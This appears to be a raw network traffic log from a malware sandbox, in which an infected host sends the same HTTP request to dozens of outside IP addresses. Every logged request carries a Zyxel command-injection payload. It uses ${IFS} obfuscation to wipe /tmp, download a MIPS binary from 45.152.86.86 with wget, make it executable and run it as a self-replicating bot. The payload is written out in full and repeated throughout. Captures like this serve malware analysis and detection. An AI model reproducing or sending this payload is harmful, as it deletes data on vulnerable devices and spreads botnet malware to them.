                              Mar 31, 2024 08:41:14.690675974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2837192.168.2.1346834123.165.42.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690713882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2838192.168.2.134780012.245.9.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690793991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2839192.168.2.133586661.174.151.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690824986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2840192.168.2.1337322208.181.86.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690872908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2841192.168.2.1338428149.147.163.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690895081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2842192.168.2.133353697.119.114.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690948009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2843192.168.2.1333538199.247.146.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690978050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2844192.168.2.1343466107.203.188.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691013098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2845192.168.2.1349498181.78.100.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691049099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2846192.168.2.1335410201.221.196.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691071987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2847192.168.2.135279843.54.111.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691117048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2848192.168.2.1355624222.61.65.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691144943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2849192.168.2.1349638212.223.103.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691191912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2850192.168.2.1358100119.250.129.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691230059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2851192.168.2.1350390116.15.91.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691274881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2852192.168.2.1352862219.63.119.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691334963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2853192.168.2.1360568147.103.6.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691358089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2854192.168.2.1348582114.26.71.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691387892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2855192.168.2.1354432222.148.72.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691457987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2856192.168.2.1346438183.157.193.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691498041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2857192.168.2.1335482100.207.4.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691544056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2858192.168.2.1343260122.19.171.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691571951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2859192.168.2.1358234200.159.117.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691615105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2860192.168.2.134615617.219.226.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691668987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2861192.168.2.1345946149.150.15.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691704988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2862192.168.2.136005214.128.45.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691762924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2863192.168.2.1354876172.160.162.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691797018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2864192.168.2.1343002138.107.86.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691828966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2865192.168.2.1341548130.209.140.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691899061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2866192.168.2.133696099.166.150.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691925049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2867192.168.2.134669689.156.60.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.691977978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2868192.168.2.1349792188.90.103.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.692034006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2869192.168.2.1344538179.107.162.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.692078114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2870192.168.2.133506436.236.74.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.692104101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2871192.168.2.1350430105.198.74.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.692172050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2872192.168.2.133786036.20.185.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.692225933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2873192.168.2.134065617.116.9.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.692251921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2874192.168.2.1356418105.209.200.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.692296028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2875192.168.2.135715099.244.149.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.692356110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2876192.168.2.1343236211.252.209.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.692406893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2877192.168.2.1339784168.147.157.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.692435980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2878192.168.2.1335392184.152.116.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.696520090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2879192.168.2.134364671.203.189.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.696568012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2880192.168.2.1354996179.57.220.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.696620941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2881192.168.2.134439869.41.41.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.696706057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2882192.168.2.135444231.68.249.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.696825981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2883192.168.2.133881834.187.94.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.696901083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2884192.168.2.1340972128.0.136.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.696954012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2885192.168.2.1357548197.95.176.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.696986914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2886192.168.2.135263683.219.160.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697038889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2887192.168.2.1348942121.122.19.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697066069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2888192.168.2.1343136189.46.58.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697119951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2889192.168.2.133378453.251.98.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697180033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2890192.168.2.13383504.216.39.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697225094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2891192.168.2.1356274148.36.233.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697304964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2892192.168.2.13406401.230.38.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697349072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2893192.168.2.134374096.195.101.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697411060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2894192.168.2.135064685.204.231.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697452068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2895192.168.2.134032099.90.9.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697494984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2896192.168.2.1352512180.20.249.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697532892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2897192.168.2.1348930104.59.182.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697578907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2898192.168.2.1351104138.127.29.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697638988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2899192.168.2.1342730121.212.12.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697690010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2900192.168.2.133546497.245.248.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697758913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2901192.168.2.1342056104.233.201.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697809935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2902192.168.2.1333516182.62.213.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697846889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2903192.168.2.134953091.244.87.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697927952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2904192.168.2.1347046175.157.18.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.697978020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2905192.168.2.13457261.211.90.94443
                              TimestampBytes transferredDirectionData
